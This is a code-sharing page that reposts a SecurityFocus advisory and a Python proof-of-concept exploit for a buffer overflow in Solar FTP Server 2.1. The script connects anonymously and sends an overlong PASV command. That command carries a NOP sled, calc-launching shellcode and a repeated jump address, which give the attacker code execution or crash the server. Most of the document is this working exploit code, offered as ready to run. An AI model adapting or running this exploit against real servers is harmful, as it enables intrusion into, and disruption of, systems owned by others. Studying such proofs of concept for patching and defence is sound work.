扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 |
source: https://www.securityfocus.com/bid/45748/info SolarFTP is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. SolarFTP 2.1 is vulnerable; other versions may also be affected. # ------------------------------------------------------------------------ # Software................Solar FTP Server 2.1 # Vulnerability...........Buffer Overflow # Download................http://www.solarftp.com/ # Release Date............1/10/2011 # Tested On...............Windows XP SP3 EN # ------------------------------------------------------------------------ # Author..................John Leitch # Site....................http://www.johnleitch.net/ # Email...................john.leitch5@gmail.com # ------------------------------------------------------------------------ # # --Description-- # # A buffer overflow in Solar FTP Server 2.1 can be exploited to execute # arbitrary code. # # # --PoC-- import socket host = 'localhost' port = 21 jmp_eax = '\xBF\x66\x02\x10' junk = '\xCC\xCC\xCC\xCC' nop_sled = '\x90\x90\x90' + '\x90\x90\x90\x90' * 2 # Calc shellcode by yours truly. Check the task manager # as the calc instance will not be visible. shell_code = "\x31\xC9"\ "\x51"\ "\x68\x63\x61\x6C\x63"\ "\x54"\ "\xB8\xC7\x93\xC2\x77"\ "\xFF\xD0" junk2 = 'A' * 7004 bad_stuff = junk + nop_sled + shell_code + jmp_eax * 249 + junk2 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(8) print 'connecting' s.connect((host, port)) print s.recv(8192) s.send('USER anonymous\r\n') print s.recv(8192) s.send('PASS x@x.com\r\n') print s.recv(8192) s.send('PASV ' + bad_stuff + '\r\n') print s.recv(8192) s.close() |
体验盒子
